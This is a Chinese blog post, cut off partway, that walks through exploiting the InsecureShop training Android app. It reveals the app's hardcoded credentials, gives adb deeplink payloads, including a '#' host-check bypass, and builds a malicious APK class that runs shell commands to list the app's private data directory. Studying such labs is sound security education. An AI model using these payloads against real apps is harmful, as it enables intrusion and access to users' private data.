<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="硬编码凭证某处硬编码了可用于登录应用程序的凭证。 通过配置文件发现登录相关活动组件  在com.insecureshop.LoginActivity 中找到登录逻辑  关键代码 1boolean auth &#x3D; Util.INSTANCE.verifyUserNamePassword(username, password);  在跟代码 12345678910111213private HashMa">
<meta property="og:type" content="article">
<meta property="og:title" content="安卓APP漏洞学习（上）">
<meta property="og:url" content="https://intbjw.github.io/2025/01/22/%E5%AE%89%E5%8D%93APP%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%EF%BC%88%E4%B8%8A%EF%BC%89%20/index.html">
<meta property="og:site_name" content="intBJW&#39;s blog">
<meta property="og:description" content="硬编码凭证某处硬编码了可用于登录应用程序的凭证。 通过配置文件发现登录相关活动组件  在com.insecureshop.LoginActivity 中找到登录逻辑  关键代码 1boolean auth &#x3D; Util.INSTANCE.verifyUserNamePassword(username, password);  在跟代码 12345678910111213private HashMa">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://intbjw.github.io/imgs/183e7c086b3081bf800fe3e88ab4f232/image.png">
<meta property="og:image" content="https://intbjw.github.io/imgs/183e7c086b3081bf800fe3e88ab4f232/Pulrgximageimage_1uuwQOow_B.png">
<meta property="og:image" content="https://intbjw.github.io/imgs/183e7c086b3081bf800fe3e88ab4f232/Pulrgximageimage_2__z-9Ei8i.png">
<meta property="og:image" content="https://intbjw.github.io/imgs/183e7c086b3081bf800fe3e88ab4f232/Pulrgximageimage_QajjCd7HzX.png">
<meta property="og:image" content="https://intbjw.github.io/imgs/183e7c086b3081bf800fe3e88ab4f232/Pulrgximageimage_2MG7nQbAyb.png">
<meta property="og:image" content="https://intbjw.github.io/imgs/183e7c086b3081bf800fe3e88ab4f232/Pulrgximageimage_IvD1QHaN1B.png">
<meta property="og:image" content="https://intbjw.github.io/imgs/183e7c086b3081bf800fe3e88ab4f232/Pulrgximageimage_Cr8rmA-9qc.png">
<meta property="og:image" content="https://intbjw.github.io/imgs/183e7c086b3081bf800fe3e88ab4f232/Pulrgximageimage_aSBaXuztPO.png">
<meta property="og:image" content="https://intbjw.github.io/imgs/183e7c086b3081bf800fe3e88ab4f232/Pulrgximageimage_NYNxLhoKtM.png">
<meta property="og:image" content="https://intbjw.github.io/imgs/183e7c086b3081bf800fe3e88ab4f232/Pulrgximageimage_pnHcxnmhqn.png">
<meta property="og:image" content="https://intbjw.github.io/imgs/183e7c086b3081bf800fe3e88ab4f232/Pulrgximageimage_Grgi5ZxN0i.png">
<meta property="og:image" content="https://intbjw.github.io/imgs/183e7c086b3081bf800fe3e88ab4f232/Pulrgximageimage_2pvnImPG9-.png">
<meta property="og:image" content="https://intbjw.github.io/imgs/183e7c086b3081bf800fe3e88ab4f232/Pulrgximage0122_zwr_-2rCSw.gif">
<meta property="og:image" content="https://intbjw.github.io/imgs/183e7c086b3081bf800fe3e88ab4f232/Pulrgximageimage_en3-Hbq6NK.png">
<meta property="og:image" content="https://intbjw.github.io/imgs/183e7c086b3081bf800fe3e88ab4f232/Pulrgximageimage_6FKLgC2yfC.png">
<meta property="article:published_time" content="2025-01-22T04:18:02.000Z">
<meta property="article:modified_time" content="2025-01-23T08:07:35.410Z">
<meta property="article:author" content="intBJW">
<meta property="article:tag" content="移动安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://intbjw.github.io/imgs/183e7c086b3081bf800fe3e88ab4f232/image.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>安卓APP漏洞学习（上）</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
      <link rel="alternate" href="/true" title="intBJW&#39;s blog" type="application/atom+xml" />
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/intbjw">项目</a></li><!--
     --><!--
       --><li><a href="/search/">搜索</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2024/11/18/%E7%AC%AC%E4%B8%83%E5%B1%8A%E6%B5%99%E6%B1%9F%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E4%B8%8E%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E7%AB%9E%E8%B5%9B%E5%86%B3%E8%B5%9B%20Reverse/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://intbjw.github.io/2025/01/22/%E5%AE%89%E5%8D%93APP%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%EF%BC%88%E4%B8%8A%EF%BC%89%20/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://intbjw.github.io/2025/01/22/%E5%AE%89%E5%8D%93APP%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%EF%BC%88%E4%B8%8A%EF%BC%89%20/&text=安卓APP漏洞学习（上）"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://intbjw.github.io/2025/01/22/%E5%AE%89%E5%8D%93APP%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%EF%BC%88%E4%B8%8A%EF%BC%89%20/&title=安卓APP漏洞学习（上）"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://intbjw.github.io/2025/01/22/%E5%AE%89%E5%8D%93APP%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%EF%BC%88%E4%B8%8A%EF%BC%89%20/&is_video=false&description=安卓APP漏洞学习（上）"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=安卓APP漏洞学习（上）&body=Check out this article: https://intbjw.github.io/2025/01/22/%E5%AE%89%E5%8D%93APP%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%EF%BC%88%E4%B8%8A%EF%BC%89%20/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://intbjw.github.io/2025/01/22/%E5%AE%89%E5%8D%93APP%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%EF%BC%88%E4%B8%8A%EF%BC%89%20/&title=安卓APP漏洞学习（上）"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://intbjw.github.io/2025/01/22/%E5%AE%89%E5%8D%93APP%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%EF%BC%88%E4%B8%8A%EF%BC%89%20/&title=安卓APP漏洞学习（上）"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://intbjw.github.io/2025/01/22/%E5%AE%89%E5%8D%93APP%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%EF%BC%88%E4%B8%8A%EF%BC%89%20/&title=安卓APP漏洞学习（上）"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://intbjw.github.io/2025/01/22/%E5%AE%89%E5%8D%93APP%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%EF%BC%88%E4%B8%8A%EF%BC%89%20/&title=安卓APP漏洞学习（上）"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://intbjw.github.io/2025/01/22/%E5%AE%89%E5%8D%93APP%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%EF%BC%88%E4%B8%8A%EF%BC%89%20/&name=安卓APP漏洞学习（上）&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://intbjw.github.io/2025/01/22/%E5%AE%89%E5%8D%93APP%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%EF%BC%88%E4%B8%8A%EF%BC%89%20/&t=安卓APP漏洞学习（上）"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%A1%AC%E7%BC%96%E7%A0%81%E5%87%AD%E8%AF%81"><span class="toc-number">1.</span> <span class="toc-text">硬编码凭证</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#URL%E9%AA%8C%E8%AF%81%E4%B8%8D%E8%B6%B3"><span class="toc-number">2.</span> <span class="toc-text">URL验证不足</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%BB%E6%9C%BA%E9%AA%8C%E8%AF%81%E5%BC%B1%E6%A3%80%E6%9F%A5"><span class="toc-number">3.</span> <span class="toc-text">主机验证弱检查</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C"><span class="toc-number">4.</span> <span class="toc-text">任意代码执行</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%AE%BF%E9%97%AE%E5%8F%97%E4%BF%9D%E6%8A%A4%E7%9A%84%E7%BB%84%E4%BB%B6"><span class="toc-number">5.</span> <span class="toc-text">访问受保护的组件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E7%AA%83%E5%8F%96"><span class="toc-number">6.</span> <span class="toc-text">任意文件窃取</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8%E5%85%B7%E6%9C%89%E5%B7%B2%E7%9F%A5%E6%BC%8F%E6%B4%9E%E7%9A%84%E7%BB%84%E4%BB%B6"><span class="toc-number">7.</span> <span class="toc-text">使用具有已知漏洞的组件</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        安卓APP漏洞学习（上）
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">intBJW</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2025-01-22T04:18:02.000Z" class="dt-published" itemprop="datePublished">2025-01-22</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/%E7%A7%BB%E5%8A%A8%E5%AE%89%E5%85%A8/" rel="tag">移动安全</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h2 id="硬编码凭证"><a href="#硬编码凭证" class="headerlink" title="硬编码凭证"></a>硬编码凭证</h2><p>某处硬编码了可用于登录应用程序的凭证。</p>
<p>通过配置文件发现登录相关活动组件</p>
<p><img src="/../imgs/183e7c086b3081bf800fe3e88ab4f232/image.png" alt="image.png"></p>
<p>在<code>com.insecureshop.LoginActivity</code> 中找到登录逻辑</p>
<p><img src="/../imgs/183e7c086b3081bf800fe3e88ab4f232/Pulrgximageimage_1uuwQOow_B.png" alt="183e7c086b3081bf800fe3e88ab4f232&#x2F;Pulrgximageimage_1uuwQOow_B.png"></p>
<p>关键代码</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">boolean</span> <span class="variable">auth</span> <span class="operator">=</span> Util.INSTANCE.verifyUserNamePassword(username, password);</span><br></pre></td></tr></table></figure>

<p>在跟代码</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> HashMap&lt;String, String&gt; <span class="title function_">getUserCreds</span><span class="params">()</span> &#123;</span><br><span class="line">    HashMap&lt;String, String&gt; userCreds = <span class="keyword">new</span> <span class="title class_">HashMap</span>&lt;&gt;();</span><br><span class="line">    userCreds.put(<span class="string">&quot;shopuser&quot;</span>, <span class="string">&quot;!ns3csh0p&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> userCreds;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="type">boolean</span> <span class="title function_">verifyUserNamePassword</span><span class="params">(String username, String password)</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (username == <span class="literal">null</span> || password == <span class="literal">null</span>) &#123;</span><br><span class="line">        <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">IllegalArgumentException</span>(<span class="string">&quot;Username and password must not be null&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="type">String</span> <span class="variable">storedPassword</span> <span class="operator">=</span> getUserCreds().get(username);</span><br><span class="line">    <span class="keyword">return</span> storedPassword != <span class="literal">null</span> &amp;&amp; storedPassword.equals(password);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="URL验证不足"><a href="#URL验证不足" class="headerlink" title="URL验证不足"></a><strong>URL验证不足</strong></h2><p>通过深度链接可以在webview中加载任意URL。</p>
<p>deeplink是特定的URI，</p>
<ul>
<li>可以将用户直接带到应用程序中的特定位置，而不是打开外部网站。</li>
<li>这有助于用户在网页和移动应用之间导航。</li>
</ul>
<p>格式</p>
<p><img src="/../imgs/183e7c086b3081bf800fe3e88ab4f232/Pulrgximageimage_2__z-9Ei8i.png" alt="183e7c086b3081bf800fe3e88ab4f232&#x2F;Pulrgximageimage_2__z-9Ei8i.png"></p>
<p><img src="/../imgs/183e7c086b3081bf800fe3e88ab4f232/Pulrgximageimage_QajjCd7HzX.png" alt="183e7c086b3081bf800fe3e88ab4f232&#x2F;Pulrgximageimage_QajjCd7HzX.png"></p>
<p>通过配置文件获取到<code>insecureshop</code></p>
<p><img src="/../imgs/183e7c086b3081bf800fe3e88ab4f232/Pulrgximageimage_2MG7nQbAyb.png" alt="183e7c086b3081bf800fe3e88ab4f232&#x2F;Pulrgximageimage_2MG7nQbAyb.png"></p>
<p><img src="/../imgs/183e7c086b3081bf800fe3e88ab4f232/Pulrgximageimage_IvD1QHaN1B.png" alt="183e7c086b3081bf800fe3e88ab4f232&#x2F;Pulrgximageimage_IvD1QHaN1B.png"></p>
<p>有一个检查来验证URI路径是否等于&#x2F;web，之后从一个intent中提取参数url到一个名为data的参数，该参数随后会在webview中加载。这非常有趣，因为我们可以构造这样的URI并传递任意参数作为url。我们将通过使用adb来实现这一点。<br>具体来说，我们将通过adb调用活动管理器，并指定一个动作和一个intent URI。以下命令可以实现这一点。</p>
<p><img src="/../imgs/183e7c086b3081bf800fe3e88ab4f232/Pulrgximageimage_Cr8rmA-9qc.png" alt="183e7c086b3081bf800fe3e88ab4f232&#x2F;Pulrgximageimage_Cr8rmA-9qc.png"></p>
<p>当然我们也可以去构造html让用户去点击</p>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">head</span>&gt;</span><span class="tag">&lt;<span class="name">title</span>&gt;</span>Deeplink<span class="tag">&lt;/<span class="name">title</span>&gt;</span><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span></span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">body</span> <span class="attr">style</span>=<span class="string">&quot;text-align:center;&quot;</span>&gt;</span></span></span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">hl</span>&gt;</span><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">&quot;insecureshop://com.insecureshop/web/?url=https://www.google.com&quot;</span>&gt;</span>Click here<span class="tag">&lt;/<span class="name">a</span>&gt;</span><span class="tag">&lt;/<span class="name">h1</span>&gt;</span></span></span><br><span class="line"><span class="language-xml"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span></span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>

<p>深度链接滥用的影响</p>
<p><img src="/../imgs/183e7c086b3081bf800fe3e88ab4f232/Pulrgximageimage_aSBaXuztPO.png" alt="183e7c086b3081bf800fe3e88ab4f232&#x2F;Pulrgximageimage_aSBaXuztPO.png"></p>
<p><img src="/../imgs/183e7c086b3081bf800fe3e88ab4f232/Pulrgximageimage_NYNxLhoKtM.png" alt="183e7c086b3081bf800fe3e88ab4f232&#x2F;Pulrgximageimage_NYNxLhoKtM.png"></p>
<h2 id="主机验证弱检查"><a href="#主机验证弱检查" class="headerlink" title="主机验证弱检查"></a><strong>主机验证弱检查</strong></h2><p>可以绕过主机验证检查，在webview中加载任意URL。</p>
<p><img src="/../imgs/183e7c086b3081bf800fe3e88ab4f232/Pulrgximageimage_pnHcxnmhqn.png" alt="183e7c086b3081bf800fe3e88ab4f232&#x2F;Pulrgximageimage_pnHcxnmhqn.png"></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (uri != <span class="literal">null</span>) &#123;</span><br><span class="line">    <span class="type">String</span> <span class="variable">data</span> <span class="operator">=</span> <span class="literal">null</span>;</span><br><span class="line">    <span class="keyword">if</span> (!StringsKt.equals$<span class="keyword">default</span>(uri.getPath(), <span class="string">&quot;/web&quot;</span>, <span class="literal">false</span>, <span class="number">2</span>, <span class="literal">null</span>)) &#123;</span><br><span class="line">        <span class="keyword">if</span> (StringsKt.equals$<span class="keyword">default</span>(uri.getPath(), <span class="string">&quot;/webview&quot;</span>, <span class="literal">false</span>, <span class="number">2</span>, <span class="literal">null</span>)) &#123;</span><br><span class="line">            <span class="type">Intent</span> <span class="variable">intent2</span> <span class="operator">=</span> getIntent();</span><br><span class="line">            Intrinsics.checkExpressionValueIsNotNull(intent2, <span class="string">&quot;intent&quot;</span>);</span><br><span class="line">            <span class="type">Uri</span> <span class="variable">data2</span> <span class="operator">=</span> intent2.getData();</span><br><span class="line">            <span class="keyword">if</span> (data2 == <span class="literal">null</span>) &#123;</span><br><span class="line">                Intrinsics.throwNpe();</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="type">String</span> <span class="variable">queryParameter</span> <span class="operator">=</span> data2.getQueryParameter(<span class="string">&quot;url&quot;</span>);</span><br><span class="line">            <span class="keyword">if</span> (queryParameter == <span class="literal">null</span>) &#123;</span><br><span class="line">                Intrinsics.throwNpe();</span><br><span class="line">            &#125;</span><br><span class="line">            Intrinsics.checkExpressionValueIsNotNull(queryParameter, <span class="string">&quot;intent.data!!.getQueryParameter(\&quot;url\&quot;)!!&quot;</span>);</span><br><span class="line">            <span class="keyword">if</span> (StringsKt.endsWith$<span class="keyword">default</span>(queryParameter, <span class="string">&quot;insecureshopapp.com&quot;</span>, <span class="literal">false</span>, <span class="number">2</span>, <span class="literal">null</span>)) &#123;</span><br><span class="line">                <span class="type">Intent</span> <span class="variable">intent3</span> <span class="operator">=</span> getIntent();</span><br><span class="line">                Intrinsics.checkExpressionValueIsNotNull(intent3, <span class="string">&quot;intent&quot;</span>);</span><br><span class="line">                <span class="type">Uri</span> <span class="variable">data3</span> <span class="operator">=</span> intent3.getData();</span><br><span class="line">                data = data3 != <span class="literal">null</span> ? data3.getQueryParameter(<span class="string">&quot;url&quot;</span>) : <span class="literal">null</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="type">Intent</span> <span class="variable">intent4</span> <span class="operator">=</span> getIntent();</span><br><span class="line">        Intrinsics.checkExpressionValueIsNotNull(intent4, <span class="string">&quot;intent&quot;</span>);</span><br><span class="line">        <span class="type">Uri</span> <span class="variable">data4</span> <span class="operator">=</span> intent4.getData();</span><br><span class="line">        data = data4 != <span class="literal">null</span> ? data4.getQueryParameter(<span class="string">&quot;url&quot;</span>) : <span class="literal">null</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (data == <span class="literal">null</span>) &#123;</span><br><span class="line">        finish();</span><br><span class="line">    &#125;</span><br><span class="line">    webview.loadUrl(data);</span><br><span class="line">    Prefs.INSTANCE.getInstance(<span class="built_in">this</span>).setData(data);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>看一下这段代码的逻辑</p>
<ol>
<li>获取uri对象用的path对象</li>
<li>判断path中是否包含<code>/webview</code></li>
<li>解析path，判断<code>?url=</code>参数是否为空</li>
<li>判断url参数是否以<code>insecureshopapp.com</code> 结尾</li>
<li>把url参数存放到data</li>
<li>最后使用webview.loadUrl(data);</li>
</ol>
<p>可以通过#进行绕过，payload如下</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">adb shell am start - a android.intent.action.VIEW - d insecureshop://com.insecureshop/webview?url=https://www.baidu.com%23insecureshopapp.com</span><br></pre></td></tr></table></figure>

<p><img src="/../imgs/183e7c086b3081bf800fe3e88ab4f232/Pulrgximageimage_Grgi5ZxN0i.png" alt="183e7c086b3081bf800fe3e88ab4f232&#x2F;Pulrgximageimage_Grgi5ZxN0i.png"></p>
<h2 id="任意代码执行"><a href="#任意代码执行" class="headerlink" title="任意代码执行"></a><strong>任意代码执行</strong></h2><p>通过第三方包上下文执行任意代码。</p>
<p>在LoginActivity发现以下代码</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span> (PackageInfo info : getPackageManager().getInstalledPackages(<span class="number">0</span>)) &#123;</span><br><span class="line">    <span class="type">String</span> <span class="variable">packageName</span> <span class="operator">=</span> info.packageName;</span><br><span class="line">    <span class="keyword">if</span> (packageName.startsWith(<span class="string">&quot;com.insecureshopapp&quot;</span>)) &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="type">Context</span> <span class="variable">packageContext</span> <span class="operator">=</span> createPackageContext(packageName, Context.CONTEXT_INCLUDE_CODE | Context.CONTEXT_IGNORE_SECURITY);</span><br><span class="line">            <span class="type">Object</span> <span class="variable">value</span> <span class="operator">=</span> packageContext.getClassLoader()</span><br><span class="line">                .loadClass(<span class="string">&quot;com.insecureshopapp.MainInterface&quot;</span>)</span><br><span class="line">                .getMethod(<span class="string">&quot;getInstance&quot;</span>, Context.class)</span><br><span class="line">                .invoke(<span class="literal">null</span>, <span class="built_in">this</span>);</span><br><span class="line">            Log.d(<span class="string">&quot;object_value&quot;</span>, value.toString());</span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">            <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">RuntimeException</span>(e);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<p>代码分析：</p>
<ol>
<li>首先回去遍历已经安装的应用包，获取每个应用的packageName</li>
<li>检查包名中是否以<code>com.insecureshopapp</code> 开头</li>
<li>动态加载包中的类，使用 createPackageContext 创建目标包的上下文（Context）。参数 3 表示 Context.CONTEXT_INCLUDE_CODE |<br>Context.CONTEXT_IGNORE_SECURITY，即允许加载代码并忽略安全限制。</li>
<li>使用 ClassLoader 动态加载目标包中的 com.insecureshopapp.MainInterface 类。</li>
</ol>
<p>那么我们可以创建一个恶意apk <code>com.insecureshopapp</code> 类MainInterface编写getInstance方法</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.insecureshopapp;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> android.content.Context;</span><br><span class="line"><span class="keyword">import</span> android.util.Log;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.BufferedReader;</span><br><span class="line"><span class="keyword">import</span> java.io.InputStreamReader;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">MainInterface</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> Object <span class="title function_">getInstance</span><span class="params">(Context context)</span> &#123;</span><br><span class="line">        <span class="type">StringBuilder</span> <span class="variable">output</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">StringBuilder</span>();</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="type">Process</span> <span class="variable">process</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ProcessBuilder</span>(<span class="string">&quot;sh&quot;</span>, <span class="string">&quot;-c&quot;</span>, <span class="string">&quot;whoami;ls /data/data/com.insecureshop/&quot;</span>).start();</span><br><span class="line">            <span class="type">BufferedReader</span> <span class="variable">reader</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">BufferedReader</span>(<span class="keyword">new</span> <span class="title class_">InputStreamReader</span>(process.getInputStream()));</span><br><span class="line">            String line;</span><br><span class="line">            <span class="keyword">while</span> ((line = reader.readLine()) != <span class="literal">null</span>) &#123;</span><br><span class="line">                output.append(line).append(<span class="string">&quot;\n&quot;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">            process.waitFor();</span><br><span class="line">            